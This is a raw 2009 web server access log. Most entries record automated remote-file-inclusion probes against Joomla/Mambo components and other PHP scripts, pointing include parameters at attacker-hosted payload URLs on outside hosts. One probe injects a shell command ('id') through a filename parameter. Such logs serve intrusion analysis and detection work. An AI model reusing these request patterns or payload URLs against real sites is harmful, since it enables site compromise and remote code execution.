122.153.212.195 - - [08/Jun/2009:02:55:00 -0400] "GET /logs/error_log.Q109041400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
123.143.98.5 - - [08/Jun/2009:02:55:20 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [08/Jun/2009:02:55:20 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [08/Jun/2009:02:55:21 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:02:55:33 -0400] "GET /images/_notes/nav_store_cart_orng.jpg.mno HTTP/1.0" 200 247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.15.161.2 - - [08/Jun/2009:02:56:38 -0400] "GET /kontol.php?url=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:56:38 -0400] "GET /logs/access_log.Q109052500/kontol.php?url=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:56:38 -0400] "GET /logs/kontol.php?url=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:56:38 -0400] "GET /logs/access_log.Q109053100/kontol.php?url=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:56:42 -0400] "GET /logs/access_log.Q109053000/kontol.php?url=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.59.53.130 - - [08/Jun/2009:02:56:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.59.53.130 - - [08/Jun/2009:02:56:59 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.59.53.130 - - [08/Jun/2009:02:57:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
88.59.53.130 - - [08/Jun/2009:02:57:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
209.172.33.230 - - [08/Jun/2009:02:57:03 -0400] "GET /logs/access_log.Q109052900%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:02:57:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.15.161.2 - - [08/Jun/2009:02:57:53 -0400] "GET /kontol.php?url=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:57:53 -0400] "GET /logs/kontol.php?url=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:57:53 -0400] "GET /logs/access_log.Q109052500%20%20/kontol.php?url=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:02:58:14 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:58:16 -0400] "GET /logs/access_log.Q109053000%20%20/kontol.php?url=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:58:48 -0400] "GET /logs/access_log.Q108121900%20%20//akocomments.php?mosConfig_absolute_path=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:58:48 -0400] "GET //akocomments.php?mosConfig_absolute_path=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:58:49 -0400] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
85.114.128.50 - - [08/Jun/2009:02:59:39 -0400] "GET /main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt%7Cecho%20l33tb1tchx1;%20id%7C HTTP/1.1" 404 206 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
85.114.128.50 - - [08/Jun/2009:02:59:39 -0400] "GET /logs/error_log.Q108053100/main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt%7Cecho%20l33tb1tchx1;%20id%7C HTTP/1.1" 404 232 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
85.114.128.50 - - [08/Jun/2009:02:59:39 -0400] "GET /logs/main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt%7Cecho%20l33tb1tchx1;%20id%7C HTTP/1.1" 404 211 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
80.67.20.178 - - [08/Jun/2009:03:00:01 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
80.67.20.178 - - [08/Jun/2009:03:00:01 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:03:00:18 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
123.143.98.5 - - [08/Jun/2009:03:00:39 -0400] "GET /logs/access_log.Q109052900%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [08/Jun/2009:03:01:22 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:03:03:00 -0400] "GET //components/com_virtuemart/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:03:03:00 -0400] "GET /logs//components/com_virtuemart/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:03:03:00 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.172.33.230 - - [08/Jun/2009:03:03:45 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
217.147.29.190 - - [08/Jun/2009:03:04:08 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.147.29.190 - - [08/Jun/2009:03:04:08 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.147.29.190 - - [08/Jun/2009:03:04:09 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:03:04:37 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:04:57 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:05:00 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
209.59.12.99 - - [08/Jun/2009:03:05:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [08/Jun/2009:03:05:17 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:03:05:28 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/classes/payment/uk_creditcard.cfg.php?mosConfig-absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:05:34 -0400] "GET /logs/access_log.Q109052600%20%20//akocomments.php?mosConfig_absolute_path=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.71.14 - - [08/Jun/2009:03:06:25 -0400] "GET /logs/access_log.Q107073100 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.212.195 - - [08/Jun/2009:03:07:18 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
222.162.115.67 - - [08/Jun/2009:03:07:24 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:07:24 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:07:26 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:07:26 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:07:26 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:07:28 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:07:28 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:07:28 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:07:29 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.49.99.7 - - [08/Jun/2009:03:07:38 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.49.99.7 - - [08/Jun/2009:03:07:43 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.49.99.7 - - [08/Jun/2009:03:07:43 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [08/Jun/2009:03:07:48 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:07:53 -0400] "GET /logs/access_log.Q109053100/index.php?arquivo=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:07:53 -0400] "GET /index.php?arquivo=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:07:53 -0400] "GET /logs/index.php?arquivo=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
123.143.98.5 - - [08/Jun/2009:03:08:12 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:08:38 -0400] "GET /logs/access_log.Q108121900%20%20/index.php?conteudo=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:08:38 -0400] "GET /logs/index.php?conteudo=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:08:38 -0400] "GET /index.php?conteudo=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:09:14 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?arquivo=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:09:33 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:09:37 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:09:37 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:10:03 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:10:03 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.162.115.67 - - [08/Jun/2009:03:10:03 -0400] "GET /logs/access_log.Q109051100%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:03:10:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.184.52.8 - - [08/Jun/2009:03:11:11 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:11:11 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:11:11 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:11:39 -0400] "GET /logs/access_log.Q109051000/index.php?conteudo=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:11:49 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:11:49 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:11:49 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:12:28 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:12:28 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:12:28 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:12:29 -0400] "GET /logs/access_log.Q108112300%20%20//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:13:35 -0400] "GET /logs/access_log.Q108112300%20%20//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.169.210.130 - - [08/Jun/2009:03:13:43 -0400] "GET /logs/access_log.Q109051000//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:13:44 -0400] "GET //?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.76"
217.169.210.130 - - [08/Jun/2009:03:13:47 -0400] "GET /logs//?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 4639 "-" "libwww-perl/5.76"
122.201.76.100 - - [08/Jun/2009:03:13:47 -0400] "GET /logs/access_log.Q108112300%20%20//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:03:13:56 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:03:13:56 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:03:13:58 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
217.147.30.80 - - [08/Jun/2009:03:15:00 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:03:15:01 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:03:15:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.201.76.100 - - [08/Jun/2009:03:15:31 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:15:31 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:15:32 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:15:32 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:15:32 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:03:15:32 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
200.142.148.142 - - [08/Jun/2009:03:16:41 -0400] "GET /logs/login.php?dir=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.142.148.142 - - [08/Jun/2009:03:16:41 -0400] "GET /logs/access_log.Q109050300%20%20/login.php?dir=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:03:16:47 -0400] "GET /logs/error_log.Q109052800//skins/zero_vote/login.php?dir=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:03:16:47 -0400] "GET //skins/zero_vote/login.php?dir=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:03:16:47 -0400] "GET /logs//skins/zero_vote/login.php?dir=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:03:16:54 -0400] "GET /logs/error_log.Q108051400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
91.184.52.8 - - [08/Jun/2009:03:16:56 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.142.148.142 - - [08/Jun/2009:03:17:01 -0400] "GET /logs/access_log.Q109051100%20%20/login.php?dir=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.49.99.7 - - [08/Jun/2009:03:17:13 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:17:41 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
